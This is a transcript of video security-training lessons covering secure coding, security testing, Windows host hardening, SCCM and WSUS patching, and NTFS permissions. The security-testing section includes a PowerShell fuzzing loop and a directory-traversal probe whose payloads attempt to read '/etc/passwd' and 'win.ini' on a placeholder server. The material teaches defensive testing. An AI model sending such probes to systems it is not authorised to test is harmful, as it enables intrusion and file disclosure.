pane includes links such as Home, Books, and News. By default, the Home link is selected. The second section
includes the Page and Discussion tabs. By default, the Page tabbed page is open. The content of the Home link
is displayed in the second section. The second section includes links such as the Introduction, Session
Management, Input Data Validation, and Cryptography.] Consider, for example, the OWASP Secure Coding
Cheat Sheet on the screen listed now. In the overview or table of contents, we can see the categories related to
secure coding. For example, for User Authentication, Session Management, Input Data Validation. Let's go
ahead and click on that.
[He clicks the Input Data Validation link and its web page opens. This web page includes URLs such as
http://www.owasp.org/index.php/Input_Validation_Cheat_Sheet and
http://www.owasp.org/index.php/Logging_Cheat_Sheet. He clicks the
http://www.owasp.org/index.php/Input_Validation_Cheat_Sheet URL.] Here, we can click the link to read
about Input Data Validation as it relates to secure coding. [The Input Validation Cheat Sheet web page opens
in the www.owasp.org web site.] Now remember, it's going to vary whether you're using Python or C++ or
Java to write your code. But now that we're in the input validation documentation, we can start to go down and
read a little bit about the detail related to that. For example, with Java whether we're using server-side or
client-side code and so on. [He resumes the explanation of the secure coding. He is referring to the following
lines of code: $admin_privilege=$true, try, {, custom_function arg1 arg2, if ($condition -eq "Value"), {,
$admin_privilege=$true, }, }, catch. Code ends.] As a simple example, consider the code on the screen, where an admin_privilege variable is being set to a value of true. Then we've got a try-catch block, which captures runtime problems or errors. And here, we're running a custom function and giving it some arguments. But then there's an if statement testing a condition, and essentially it is setting the admin_privilege variable again to true.
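Reconstructed in a more readable form, the snippet on the screen looks roughly like this. Note that custom_function, its arguments, and $condition are placeholders taken from the slide, not real code from any product.

$admin_privilege = $true          # set unconditionally, before any check is made
try {
    custom_function arg1 arg2
    if ($condition -eq "Value") {
        $admin_privilege = $true  # the only place this should ever be set
    }
}
catch {
    # handle the error; privileges should not be granted on this path
}

A safer version would initialize $admin_privilege to $false and only flip it to $true inside the if statement, once the condition has actually been met.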
Now the problem with the coding here is that, outside of the try-catch structure, the admin_privilege variable is being set to true unconditionally. We don't want to grant privileges unless very specific conditions are met in a proper fashion. This type of obvious error would, more likely than not, be quickly picked up by another set of eyes through peer review. In this video, we discussed secure coding.
In this video, you will learn how to properly test technology solutions for security.
Objectives
[Topic title: Security testing. The presenter is Dan Lachance.] In this video, I'll talk about security testing.
Security testing might be required by law or for regulatory compliance. In some cases, we might need to go
through third-party businesses to make sure that we have proper security testing in place to secure contracts.
Then, of course, we might have to pass audits or achieve some kind of accreditation such as PCI-DSS. Now
the PCI-DSS standard applies to organizations that work with cardholder data – such as credit and debit card data – to make sure that that data is protected properly.
Fuzzing means that we are feeding abnormal data to an application and we want to observe its results. So, for
instance, we might pass a number to a string variable, we might read beyond the memory required to store a value, as was the problem related to the Heartbleed bug, or we might make sure that applications don't crash under denial of service conditions. Many tools can be used to execute multiple fuzz tests against the target. So it could
be manual. But often, it's done in an automated fashion using a tool designed specifically for fuzz testing. Now
fuzz testing must be done from the perspective of a malicious user or a security tester just testing an
application.
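As a rough illustration of what an automated fuzz test looks like, here's a minimal PowerShell sketch. The URL and the form field name are placeholders for a test system you own, not a real application.

$targetUrl = 'http://testserver.example.com/feedback'
1..50 | ForEach-Object {
    # Build a random-length string of printable characters as the abnormal input.
    $length = Get-Random -Minimum 1 -Maximum 5000
    $junk = -join (1..$length | ForEach-Object { [char](Get-Random -Minimum 32 -Maximum 127) })
    try {
        $response = Invoke-WebRequest -Uri $targetUrl -Method Post -Body @{ comment = $junk } -UseBasicParsing
        # Watch for unexpected status codes or sensitive data echoed back in the response.
        '{0} chars -> HTTP {1}' -f $length, $response.StatusCode
    }
    catch {
        # A crash, hang, or server error here is exactly what fuzz testing is meant to surface.
        '{0} chars -> error: {1}' -f $length, $_.Exception.Message
    }
}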
A web application vulnerability scan is another way to test the security of an application. Now, again, this can
be manual or automated. There are tools such as Nexpose, Nikto, or Qualys-related tools that will do this type of web app vulnerability scan for us, checking for things like standard misconfigurations or the allowing of directory traversals through the web app file system. It'll check for the possibility of SQL injection attacks due to improper field validation on web forms and also things like remote command execution.
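As a simplified example of the kind of check such a scanner automates, here's a small PowerShell probe for directory traversal. The base URL and the file query parameter are hypothetical, and a real scanner would try far more payloads.

$base = 'http://testserver.example.com'
$payloads = '../../../../etc/passwd', '..\..\..\..\windows\win.ini'
foreach ($p in $payloads) {
    try {
        $r = Invoke-WebRequest -Uri "$base/download?file=$p" -UseBasicParsing
        # A response containing file contents suggests the traversal was not blocked.
        if ($r.Content -match 'root:x:|\[fonts\]') {
            "Possible directory traversal with payload: $p"
        }
    }
    catch {
        # 4xx and 5xx responses land here, which usually means the payload was rejected.
    }
}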
A static code analysis is another part of security testing for an app; it's often called white box testing. This applies to both compiled as well as noncompiled code. It tests an application's inputs as well as the outputs, depending on what was fed into the app. It's used to detect flaws, including things like backdoors. Backdoors
allow a malicious user into the application with escalated privileges without the system owners' knowledge. A
regression analysis can also be conducted. It's also considered to be a predictive analysis where we look at the
varying relationships between different application components. Sometimes, when you do security testing on
one component of an application, it appears to be solid. But, when we look at the interactions and add more moving parts, then we might realize that there is some kind of a security vulnerability.
So sometimes we might, for instance, see the same variable end up with differing values when it's passed to a different application component. An interception proxy can also be used as part of security testing.
This is also called an inline proxy. It's used to crawl a web application, in other words, to pore over it looking
for weaknesses. The interception proxy also has the ability to capture and replay web-specific traffic for an
application where parameter values can be modified. So this is really akin to a man-in-the-middle attack, but
it's part of testing. We have to account for the fact that there are malicious users that will perhaps attempt these
types of attacks. And we have to think in the same way.
Interception proxies, however, are invisible to client web browsers. Now an example of an interception proxy
is the OWASP Zed Attack Proxy. [The OWASP Zed Attack Proxy Project web page is open in the
www.owasp.org web site. The web page is divided into two sections. The first section contains the navigation
pane. The navigation pane includes links such as the Home, Chapters, and News. By default, the Home link is
selected. The second section includes the Page and Discussion tabs. By default, the Page tab is open. The
Page tabbed page includes the Main, News, and Talks tabs. By default, the Main tabbed page is open. The
Main tabbed page includes the Download ZAP button, Download OWASP ZAP! link, and zap-extensions
link.] So, if you search up OWASP and Zed Attack Proxy, which I've done here, it's pretty easy to find the
web page that explains what the purpose of this is. Its purpose is to help find security vulnerabilities in web
applications. And really, this is a tool that we could use at various phases of the system development life cycle.
So there are plenty of tools that are available to automate security testing also in the form of interception
proxies, as seen here. [Dan resumes the explanation of security testing.] Despite our best technical efforts to
secure an application...and it's very important that we do this, in the end, user acceptance testing is what really
solidifies our solution as being usable. Does the solution behavior align with design requirements, and are user
needs addressed with our solution?
So we might identify problems that were missed during testing. And this might be brought about by end-user
testing. Maybe, for example, we've got a calculation feature in a web app that does work but is unacceptably
slow. We also have to think about regulatory and contractual compliance to make sure that the solution aligns
with those. In this video, we talked about security testing.
[Topic title: Host Hardening. The presenter is Dan Lachance.] In this video, I'll demonstrate how to harden a
Windows host to reduce the attack surface. The first thing that we should keep in mind is that reducing the
attack surface, really, means only keeping things running that are absolutely required on that host operating
system. Now at the same time, we need to make sure software updates have been applied. [The Start page is
open. The page includes a search bar. Dan types update Services in the search bar. Then the links such as the
Windows Server Update services and the Windows Update link appear.] So here in my Windows Server, I'm
going to go to my Start menu and type in the word "update" and I'm going to choose Windows Update. [The
Windows Update page opens. The page is divided into two sections. The first section includes clickable
options such as the Check for update, Change settings, and View update history. The second section includes
the Download and install updates section. The Download and install updates section includes the Install
updates button.] On this particular host, we notice that we have the option to download and install updates in
the amount of 945 megabytes. So clearly, this machine is not fully up to date. However, I can see down below
when it most recently checked for updates. So today at 10:22 a.m. And I can see when updates were last
installed.
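As a quick aside, the most recently installed updates can also be listed from PowerShell on a single host, which is handy for spot checks; for example:

# Lists the ten most recently installed updates (output will vary per machine).
Get-HotFix | Sort-Object -Property InstalledOn -Descending | Select-Object -First 10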
At the same time on the left, I can also View update history. [He clicks the View update history link and View
update history page opens. A table is displayed on this page. This table has four columns and several rows.
The column headers are Name, Status, Importance, and Date installed.] So I can see the individual updates
and whether or not the Status is Succeeded, the Importance of the update, and when it was installed. But how
do you deal with that on a large scale in an enterprise? For instance, if you're a datacenter administrator, how
do you make sure that your hypervisor hosts have all the updates? Surely, there's a better way than going to
each and every one and doing it manually. And of course, there is. [He opens the System Center Configuration Manager from the task bar.] We're going to do that by using the SCCM management tool. System Center Configuration Manager, or SCCM, is a product from Microsoft's System Center suite.
[The System Center Configuration Manager window is divided into two sections. The first section includes two
subsections. The second subsection includes the Assets and Compliance and Software Library tabs. The
Software Library tab is selected by default. The first subsection is the navigation pane. The navigation pane
includes the Overview root node. The Overview root node is selected. Under the Overview root node, the
Software Updates node is selected. Under the Software Updates node, the Software Update Groups folder is
selected. The second section includes a search bar and a table. The table contains nine columns and two rows.
The column headers are Icon, Name, Description, Date Created, Last Date Modified, Percent Compliant,
Created By, Deployed, and Downloaded. In the second row, the entry under the column header Name is Win 7
Required Updates, the entry under the column header Date Created is 4/7/2016 11:19 AM, the entry under the
column header Last Date Modified is 4/7/2016 11:19 AM, the entry under the column header Percent
Compliant is 33, the entry under the column header Deployed is Yes, and the entry under the column header
Downloaded is Yes.] Now here, I've gone into the Software Library workspace in the bottom-left. And over in
the left-hand navigator, under Software Updates, I'm going to click All Software Updates. [The All Software
Updates includes a table. The table includes eight columns and several rows. The column headers are Icon,
Title, Bulletin ID, Required, Installed, Percent Compliant, Downloaded, and Deployed. One row is
highlighted. In this row, the entry under the column header Required is 0, the entry under the column header
Installed is 0, the entry under the column header Percent Compliant is 100, the entry under the column header
Downloaded is Yes, the entry under the column header Deployed is Yes.] So what SCCM can do is it can
synchronize software update metadata, even from Microsoft Online, which it's done here. And we're looking at
the metadata here. And then from here, I can work with it and get it deployed internally. Ideally, a single
configuration could deploy required updates to potentially thousands of computers. So I don't have to visit
each of those computers for update purposes. So when I'm looking at an update here, [He is referring to a row
whose entry under the column header Title is Critical Update for Office 2003, the entry under the column
header Required is 0, the entry under the column header Installed is 0, the entry under the column header
percent compliant is 100, the entry under the column header is Downloaded is No, and the entry under the
Deployed column header is No. He right-clicks on this row and a flyout appears. The flyout includes options
such as Download, Deploy, and Move.] I could right-click on it and actually Download the binary files for it.
Because again, the only thing you're seeing here when you're looking at updates is the metadata. It's not the
actual files that comprise the update, they need to be downloaded. And we can see that option here when we
right-click on a single update.
Now we also have the option of Deploying the update to a device collection. [He clicks the Deploy option
and the Deploy Software Updates Wizard opens. This is divided into two sections. The first section includes
the General, Deployment Settings, and Alerts links. By default, the General link is selected. The second section
includes the Deployment Name text box, Collection text box, and Browse button. At the bottom right-hand
side, there are Next and Cancel buttons.] Down here at the bottom, I'll click the Browse button. [The Select
Collection dialog box opens. This dialog box is divided into two sections. The first section includes a drop-
down list and a navigation pane. The navigation pane includes the Root node. The Root node includes the
Toronto Collections subnode. The second section includes a search bar. At the bottom right-hand side, there
are OK and Cancel buttons.] And I have the ability to select a collection, which is, really, just a group of
computers that I could have customized to deploy the updates to. [He clicks the Cancel button and switches
back to the Deploy software updates wizard. He clicks the Cancel button and the Configuration Manager
dialog box opens. This dialog box includes the Yes button and the No button. He clicks the Yes button and
switches back to the System Center Configuration Manager.] However, because updates are numerous, we
probably don't want to do that for individual updates like I've just demonstrated. Instead, for instance, you can
use Ctrl+click to select numerous updates. You could also search for updates here, up in the bar at the top.
Either way, when you've got multiple updates selected, you can right-click on them and Create Software
Update Group. [He has selected various rows in the table and right-clicks on one of the selected rows and then
a flyout appears. He highlights the Create Software Update Group option.] So they're grouped together in one
lump, instead of dealing with each individual update. Because, for instance, with Windows Server 2012 R2,
you know, on patch Tuesday, the second Tuesday of each month when Microsoft releases most of the updates,
you could have hundreds of updates. You probably want to group them into a Software Update Group.
[He selects the Software Update Groups view present under the Software Updates folder.] Now I've already
got some created. So let's click on that Software Update Groups view on the left. And what I would do on the
right is right-click on the Software Update Group, Download the actual update files, and then Deploy to a
collection. So that way, we're doing it on a larger scale. But there's more than just deploying updates to harden
the system. [He minimizes the screen and switches back to the View update history screen.] What about
disabling unneeded services? Let's close down some of these screens, and let's go ahead and open up our list of
services here in Windows. [He opens the Services window. The screen is divided into two sections. The first
section includes the navigation pane. The second section includes a table with five columns and several rows.
The column headers are Name, Description, Status, Startup Type, and Log On As. He double-clicks the row
whose entry under the column header Name is BranchCache.] Here I've selected the BranchCache service for
my example. Let's say we know we don't need the BranchCache feature, so I'm going to go ahead and double-
click. [The BranchCache Properties dialog box opens. It includes the General and Log On tabs. By default,
the General tabbed page is open. It includes the Startup type drop-down list, OK button, Apply button, and
Cancel button.] Here the Startup Type has been set to Automatic. Now you have to be careful with this. You
have to do a bit of research and testing to ensure that there are no dependencies even from other services for
this service to be running.
So it requires a bit of homework ahead of time. But once you're sure it doesn't need to be running, you might
change its Startup type. For example, here I might change it to Manual or completely Disabled. Now, if I were
to do that, for instance, set the Startup type to Manual, [He selects the Manual drop-down option in the Startup
type drop-down list.] I could Apply the change. But notice that the Service would still be Running, so I could
also Stop it. So it's important, whether we're using a Windows, Linux, or UNIX operating system, that we take a look at the services – or, in Linux, the daemons – that are running and determine which ones should be disabled. And in the UNIX and Linux world, you're really disabling it for given run levels in many distributions. [He clicks the Cancel button.]
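The same change can be scripted from PowerShell. Here's a minimal sketch, using BranchCache from this demo as the example; PeerDistSvc is the service name behind BranchCache on most Windows versions, so verify the name and its dependents on your own systems first.

Get-Service -Name PeerDistSvc -DependentServices   # anything listed here still depends on BranchCache
Stop-Service -Name PeerDistSvc
Set-Service -Name PeerDistSvc -StartupType Disabled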
Now aside from that there are other things that we should bear in mind too. [He closes the Services
window.] Here on my Windows Server, I can go ahead and open up my Local Group Policy Editor. [The
Local Group Policy Editor is divided into two sections. The first section is the navigation pane and the second
section is the content pane. The content pane includes a table with two columns and several rows. The column
headers are the Policy and the Security Setting.] Now in an Active Directory environment, you can configure
Group Policy Objects or GPOs, which could be applied to potentially thousands of computers that are joined to
your Active Directory domain. But here, I'm just going to configure my Local Group Policy. Either way, we've
got thousands of settings here that we could use to harden a host. So in the left-hand navigator in my Local
Computer Policy, you can see clearly, I've already gone under Computer Configuration - Windows Settings -
Security Settings. And, for instance, here under Local Policies, I have numerous security options that I could
apply to this server.
I've got Account Policies where I could configure the Password Policy – things like password reset settings,
minimum and maximum password age, and so on. Of course, every device on a network, whether it's a server
or a smartphone, should have a host-based firewall. [He clicks the Windows Firewall with Advanced Security node. The content pane includes the Overview section and the Getting Started section.] So I could configure the inbound and outbound firewall rules on this server in this manner. [The Windows Firewall with Advanced Security node includes the Inbound Rules and the Outbound Rules nodes. He clicks the Inbound Rules node and then clicks the Outbound Rules node.] Of course, there are other ways to do it
including at the command line. I could also configure things like Software Restriction Policies – or the newer –
in the case of Windows, Application Control Policies to determine exactly which processes are allowed to run
on this particular host.
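Speaking of the command line, one of those other ways to manage the host firewall is PowerShell. Here's a minimal sketch of adding an inbound rule; the rule name and port are placeholders, not a recommendation for this server.

# Allow inbound TCP 8080 for a hypothetical internal web console.
New-NetFirewallRule -DisplayName 'Allow internal web console' -Direction Inbound `
    -Protocol TCP -LocalPort 8080 -Action Allow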
[He resumes from the desktop screen.] Of course, another aspect of hardening operating systems is to ensure
you have some kind of up-to-date and reliable antimalware scanner. Here, in my server, I'm going to search for
endpoint. [The start page opens and he types the endpoint protection in the search bar.] Here I'm using
System Center Endpoint Protection but really any antimalware solutions generally have the same configuration
settings. [He clicks the System Center Endpoint Protection link and the System Center Endpoint Protection
dialog box opens. The dialog box includes the Home tab, Update tab, and History tab. By default, the Home
tabbed page is open. There is a Scan options section on the right side. The Scan options section includes the Quick radio button, Full radio button, Custom radio button, and Scan now button.] So whether or not Real-time protection is enabled...here it's
Disabled on this server. But really it should be enabled. Notice that the Virus and spyware definitions here are
Up to date. Of course, if I go to the Update tab, I can see when that occurred. [The Update tabbed page
includes the information about the Definitions created on, the Definitions last update, and the Update
definitions button.] I can also get a list of History for quarantined or removed items. [He clicks the History
tab. The history tabbed page includes the Quarantined items and Allowed items radio buttons.] And I also
have numerous Settings. [He clicks the Settings tab. The Settings tabbed page includes two sections. The first
section includes the Scheduled scan, Default actions, and MAPS options. The second section includes the Scan
type drop-down list and the Cancel button.] Now notice a lot of them are grayed out. That's because they can be centrally controlled.
[He maximizes the System Center Configuration Manager present in the task bar.] In this case, that's done
using SCCM. That would be under the Assets and Compliance workspace in the bottom left, where under my
left-hand navigator, I could expand Endpoint Protection. [He expands the Endpoint Protection folder. It
contains the Antimalware Policies and the Windows Firewall Policies. He clicks the Antimalware Policies.
The content pane includes a table with six columns and two rows. The column headers are Icon, Name, Type,
Order, Deployments, and Description. He clicks the row whose entry under the column header Name is
Default Client antimalware policy, the entry under the column header Type is Default, the entry under the
column header Order is 10000, and the entry under the column header Deployments is 0. Then the Default
Antimalware Policy dialog box opens. It is divided into two sections. The first section is the navigation pane
and it includes the Scheduled scans, scan settings, and Default actions options. The second section is the
content pane. It includes the Scan type drop-down list and the Scan time drop-down list. At the bottom right-
hand side of the Default Antimalware Policy dialog box are the OK and Cancel buttons.] And I could
configure Antimalware Policies that would be applied to my managed stations that are being managed by
SCCM. Now, of course, you've got numerous other things you should be doing to make sure hardening is
effective like periodic penetration testing and so on. In this video, we discussed ways of hardening a host to
reduce the attack surface.
Upon completion of this video, you will be able to recognize the importance of keeping hardware and software
up to date.
Objectives
[Topic title: Patching Overview. The presenter is Dan Lachance.] In life, nothing is perfect and that includes
firmware and software. One great countermeasure is to make sure these things are patched periodically.
Vulnerabilities get discovered over time with both firmware code and software. Patching can fix security and
stability problems discovered. When we decide that we're going to deploy patches especially on a larger scale,
we need a way to monitor that patch deployment to ensure it succeeded. We also should have an enterprise-
class solution that allows us to monitor for patch compliance so that at any given moment, we can run a report
to see which devices on the network do not comply with the latest patches and therefore present a security risk.
Many modern solutions also allow us to inject patches to operating system images. So, for example, we might
have a Windows 10 standard corporate image that we deploy to new desktops. But, if that image was built a
year ago, generally speaking, it's a year out of date with patches. So there are solutions such as Microsoft
System Center Configuration Manager, among others, that allow us to inject patches into the image itself even
without it being deployed. The benefit here is that when we deploy that image, it's up to date with the latest
patches.
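Outside of SCCM, the same idea can be sketched with the built-in DISM PowerShell cmdlets, which mount an offline image and add an update package to it. The paths and the update file name here are placeholders only.

Mount-WindowsImage -ImagePath 'C:\Images\install.wim' -Index 1 -Path 'C:\Mount'
Add-WindowsPackage -Path 'C:\Mount' -PackagePath 'C:\Updates\example-update.msu'
Dismount-WindowsImage -Path 'C:\Mount' -Save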
[The System Center Configuration Manager window opens. The window is divided into two sections. The first
section is divided into two subsections. The second subsection includes the Software Library and Monitoring
tab. The first subsection is the navigation. In the navigation pane, the Overview root node is selected. Under
the Overview root node, the Operating systems node is open. Under the Operating Systems node, the
Operating Systems Images subnode is open. The second section includes a search bar and a table. The table
contains information about Windows 7 ENTERPRISEN.] For example, here in Microsoft System Center
Configuration Manager, I've got a Windows 7 ENTERPRISEN image. And, if I were to right-click on it, [A
flyout opens. The flyout includes options such as Schedule Updates, Refresh, and Delete.] I have the option to
Schedule Updates. [Dan clicks the Schedule Updates option and the Schedule Updates Wizard opens. The
Wizard is divided into two sections. The first section includes the Choose Updates, Set Schedule, and Summary
links. By default, the Choose Updates is selected. The second section includes the Select or unselect all
software updates in this list checkbox, the System architecture drop-down list, and a search bar. At the bottom
right-hand side of the Schedule Updates Wizard are the Next button, Summary, and Cancel buttons.] Now
when that dialog box opens up, the first page of the wizard gives me a list of related updates. In this case, for
Windows 7. And I can select or deselect the appropriate updates. Now when I click the Next button at the
bottom, I can then schedule when I want these injected into that image. [He clicks the Next button and the Set
Schedule page opens. It includes the As soon as possible radio button, the Continue on error checkbox, the
Update distribution points with the image checkbox, and the Next button. By default, the as soon as possible
radio button, the Continue on error checkbox, and the Update distribution points with the image checkbox are
selected.] So the beauty here is that when I deploy that Windows 7 ENTERPRISEN image in this specific
example, it will be up to date.
[He resumes the explanation of patching overview.] As mentioned, patching also deals with firmware updates.
So, at the hardware level, that includes things like BIOS updates on motherboards, wireless router firmware
updates to close security holes, printer firmware updates, router firmware updates, switches, mobile devices –
like smartphones, and Internet of Things or IoT firmware updates. These days IoT is used for a lot of consumer
devices like home video surveillance systems and the remote capability to control heating and lights and so on.
All of these types of firmware need to have the latest patches applied to make sure they work correctly, support
enhanced features, and, of course, close any known security vulnerabilities.
At the software level, of course, patching will apply fixes to operating systems, drivers, applications running
within the operating systems, or even mobile devices and the apps running on them. Pictured on the screen, we
see a screenshot of Windows Server Update Services or WSUS. [Running along the top of the Update Services
window is the menu bar. It includes menus such as the File, Action, and Window. The rest of the screen is
divided into two sections. The first section includes the navigation pane. In the second section, the Approved
Updates dialog box is open.] Now unlike SCCM, WSUS is available for free from Microsoft with their server
products. And what we see pictured here is a number of approved updates being applied for a group. We can
see in the left part of the diagram, we've got a Halifax_Computers group as well as an Update_Testing group.
These are groups of computers that we can target approved updates to. This way we know exactly which
devices are receiving which patches.
[He resumes the explanation of the patching overview.] Patching should also include deadlines whereby we
provide a notification to the user that a deadline is approaching and the patches will apply – regardless of what
the user selects. However, when we apply patches, this can slow down the computer and the network. And the
last thing we really want to do is hamper user productivity. But, at the same time, we must adhere to
organizational security standards for patching and security. So what we might do is configure maintenance
windows. A maintenance window is supported by various products and it's usually after hours where
maintenance is allowed, such as the application of software updates. The idea with the maintenance window is
to minimize the disruption to the end user. We can also configure the reboot behavior. So for example, if a user
is using their laptop to present something in a boardroom, we don't want their computer rebooting in the
middle of their presentation.
So, of course, there are many ways to get around that, including making sure that we use maintenance
windows after hours. And also, there are some software tools that can run in presentation mode that will ignore things like patch reboot requirements and so on until our presentation is complete. License agreements apply to some software updates. This might be automated or the end user might have to interact with the installation of an update to accept a license agreement.
In this video, learn how to apply patches properly to secure network hosts.
Objectives
[Topic title: Use SCCM to Deploy Patches. The presenter is Dan Lachance. Dan resumes from the System
Center Configuration Manager, and the Software Updates folder is open.] In this video, I'm going to
demonstrate how to use System Center Configuration Manager to deploy patches. We all know that one
important part of hardening hosts is to apply operating system and application software updates. Microsoft
SCCM or System Center Configuration Manager has a built-in way to centrally deploy updates and also run
reports to make sure that they were deployed successfully. In the SCCM management console on the left, I've
already gone under the Software Library workspace in the bottom left. And on the left, in the navigator, I've
gone under Software Updates.
Now it's already been configured to synchronize Software Updates metadata with Microsoft Online. So now
that I've done that, I'm going to click on All Software Updates on the left, which shows me many software
updates. [The Software Updates folder includes the All Software Updates and the Software Update Groups
options. Then, in the content pane, information about many software updates is displayed in a table with eight
columns and several rows. The column headers are Icon, Title, Bulletin ID, Required, Installed, Percent
Compliant, Downloaded, and Deployed.] Actually, specifically the metadata on the right-hand side. So we've
got for Office 2003, some .NET Framework updates and as I go down through the list, we've got numerous,
numerous, numerous updates. Now of course, if you're going to be working with deploying updates centrally
in some kind of management tool, you want to make sure that you're only synchronizing updates for software
that you use. Now SCCM, on its own, by default only allows you to deploy updates for Microsoft
products. If you need to deploy updates for other products, like Symantec or McAfee or Adobe and so on, then
either use some other tool outside of Microsoft or you can use the Microsoft System Center Update Publisher
tool, which you have to download and configure.
Anyway, here in All Software Updates, I could right-click an individual update that I want deployed to a
machine or machines. [He right-clicks the row whose entry under the column header Title is Update for
Microsoft Outlook 2010, the entry under the column header Required is 0, the entry under the column header
Installed is 0, the entry under the column header Percent Compliant is 0, the entry under the column header
Downloaded is No, and the entry under the column header Deployed is No. Then a flyout appears and it
includes the Download, Deploy, and Move options.] I could Download the binary files for that update because,
again, all we're looking at here is the metadata for the updates. And then I could deploy it by clicking
Deploy [The Deploy Software Updates Wizard opens. It is divided into two sections. The first section is the
navigation pane. The navigation pane includes links such as General, Deployment Settings, and Alerts. By
default, the General link is selected. The second section includes the Browse button and the Deployment Name
text box. At the bottom right-hand side of the Deploy Software Updates Wizard are the Cancel and Next
buttons.] and then specifying a device collection. [He clicks the Browse button and the Select Collection
window opens. The window is divided into two sections. The first section includes a drop-down list and the
navigation pane. The second section includes a search bar.] So you can't deploy updates to collections of
users. In SCCM, a collection is like a group. So you could have groups of computers that mirror departments,
the type of operating system, or the fact that they're laptops, or even geographical locations – it doesn't matter.
But once your collections are built, then it facilitates deploying things to them. In this case, software
updates. [He clicks the Cancel button and resumes from the Deploy Software Updates Wizard.]
Now instead of deploying individual updates normally, [He clicks the Cancel button and then the
Configuration Manager dialog box opens. He clicks the Yes button and the dialog box closes. He switches
back to the System Center Configuration Manager.] what one would do with this tool is select numerous
updates and put them in a software update group and manage the group of updates as an entity instead of the
individuals. So what I could do here is manually go through the list and, for example, Ctrl+click to select
multiple updates or over in the upper right, I could click Add Criteria and I could search for update metadata
that meet certain conditions. [He clicks the Add Criteria drop-down list. It includes Product, Total, and Type
drop-down options and the Add and Cancel buttons.] So maybe, what I'll do here is I'll search for things like
Product. I'll click Add. Now here, it's already got the product it's searching for – Active Directory Rights
Management Services Client 2.0 – that's not what I want. I'll go ahead and click on that link. [He clicks the
Active Directory Rights Management Services Client 2.0 link and a drop-down list appears. It includes the
Windows 7 and the Windows 8 drop-down options.] And maybe here, I'm just going to scroll all the way down
and I'm going to choose, for instance, Windows 7 assuming that's what I'm using in my environment. Then I'll
go ahead and click Search.
Now of course, I could add multiple criteria here to look for specific Windows 7 updates. But, in this case, I've got all my Windows 7 updates listed in my search results. So what I would do at this point is, for example,
click in the list and press Ctrl+A to select them all. And here, I'm going to right-click and choose Create
Software Update Group called Win 7 Updates - All. [He selects the Create software update group option from
the flyout. Then the Create Software Update Group dialog box opens. It includes the Name text box, the
Description text box, the Create button, and the Cancel button.] And I'll Create that update group. [He types
Win 7 Updates - All in the Name text box and then clicks the Create button.] So it's always easier to manage
things on a larger scale in groups rather than individually. Now that's going to show up under Software Update Groups, which I'll click on the left. So we can see on the right here now that we've got our Win 7
Updates - All software update group. So from here, I would right-click and Download all of the files and then I
would Deploy it to a device collection. Now that will take time depending on how many updates are involved
in the update group and what your internet connection speed is like.
But once that's been done, under the Monitoring tab, down in the bottom left, and then in the Reporting area,
on the left in the navigator, I could expand reports. Here, I've got numerous report categories that I could work
with to see if software updates have been applied correctly. So notice all the Software Updates categories of
Reports, such as Software Updates – C Deployment States. So I could click on that and here I have numerous
reports I could run. [The content pane includes various reports such as the States 1 - Enforcement states for a
deployment and the States 2 - Evaluation states for a deployment.] Now running the report, of course, simply
means right-clicking and choosing Run. [He right-clicks the States 2 - Evaluation states for a deployment
option. Then a flyout appears and selects the Run option. Then the States 2 - Evaluation states for a
deployment window opens.] And, in some cases, some reports will have parameters that you must specify, like
date ranges or collections. But either way, this is a nice centralized way on a larger scale to deploy and manage
and monitor updates. In this video, we learned how we can use SCCM to deploy patches.
During this video, you will learn how to set the correct access to file systems while following the principle of
least privilege.
Objectives
set the correct access to file systems while adhering to the principle of least privilege
[Topic title: File System Permissions. The presenter is Dan Lachance. The Active Directory Users and
Computers window is open. Running along the top is the menu bar. It includes the File, Action, and Help
menus. The rest of the screen is divided into two sections. The first section is the navigation pane. The Active
Directory Users and Computers is the root node, which includes the Saved Queries folder and the
fakedomain.local node. The fakedomain.local node includes Builtin, Computers, Users, and Managed Services
Accounts folders. By default, the Users folder is selected. The second section of the screen is the content pane.
It contains a table with three columns and several rows. The column headers are Name, Type, and
Description. By default, the row whose entry under the column header Name is Help Desk and the entry under
the column header Type is Security Group is highlighted.] In this video, I'll demonstrate how to set NTFS file
permissions on a Windows Server. Whenever we assign permissions to any type of network resource, we need
to make sure that we're adhering to the principle of least privilege and what that means is that we're only
granting enough privileges for a task to be completed and nothing more. So in the Windows world, for
instance, the last thing we want to do when someone needs basic file system access is to add them to an
administrators group. That's way too much power. Here in Active Directory Users and Computers, we've got a
user called HelpDesk User1. And, if we open up the Help Desk by double-clicking and go to the Members tab,
we can see that that user is a member of the Help Desk group. [Dan double-clicks the row with the entry Help
desk, and the Help Desk Properties dialog box opens. The Help Desk Properties dialog box includes the
General tab, the Members tab, and the Managed By tab. He clicks the Members tab. The Members tabbed
page includes the Add, Remove, and OK buttons. He clicks the OK button and the Help Desk Properties dialog
box closes.]
[The Data (I:) window opens. Running along the top is the menu bar. It includes the File, Share, and View
menus. The rest of the screen is divided into two sections. The first section is the navigation pane. The
navigation pane includes the Favorites, This PC, and Network nodes. The Favorite node includes the Desktop
and the Downloads subnodes. The This PC node includes the Desktop, Data (I:), and Videos subnodes. By
default, the Data (I:) subnode is selected. The second section contains the content pane. It includes the
Program Files folder and the UserDataFiles folder.] So let's go over to the file system where on Data (I:) –
my data drive on my server – I've got a folder called UserDataFiles. The goal here is to ensure that the Help
Desk group has the ability to create folders under UserDataFiles. But what we don't want is the Help Desk
group having the ability to modify user files. So to make that happen, we begin by right-clicking on the
UserDataFiles folder and going into Properties. [The UserDataFiles Properties dialog box opens. It includes
the General, Security, and Sharing tabs.] For NTFS security, we have to go onto the Security tab, so I'll click
on that. [The Security tabbed page opens in the UserDataFiles Properties dialog box. It includes the
Permissions for CREATOR OWNER drop-down list, Edit button, and Advanced button. At the bottom right-
hand side of the UserDataFiles Properties dialog box are the Ok and Cancel buttons. The Permissions for
CREATOR OWNER drop-down list includes the Full control, Modify, Special Permissions, and Read drop-
down options.] Now there are some precanned NTFS permissions as you see here on the left like Full control,
Modify, Read & execute, and so on. But, if you look through the list, there is nothing here about creating
folders.
So that's considered a Special permission. It's a little more granular. So I'm not going to click the Edit button
because I want to add more specific permissions otherwise called Special permissions. For that, I'll click on the
Advanced button [He clicks the Advanced button and the Advanced Security Settings for UserDataFiles dialog
box opens. It includes the Permissions, Auditing, and Effective Access tabs. By default, the Permissions tabbed
page is open. The Permissions tabbed page includes the Add, OK, and Cancel buttons.] and from here, I'm
going to click Add. [The Permissions Entry for UserDataFiles dialog box opens. It includes the Select a
principal link, the Type drop-down list, the Applies to drop-down list, the Basic permissions section, and the
Cancel button.] I'll then click on the Select a principal link [The Select User, Computer, Service Account, or
Group dialog box opens. It includes the Enter the object name to select text box, the Advanced button, the
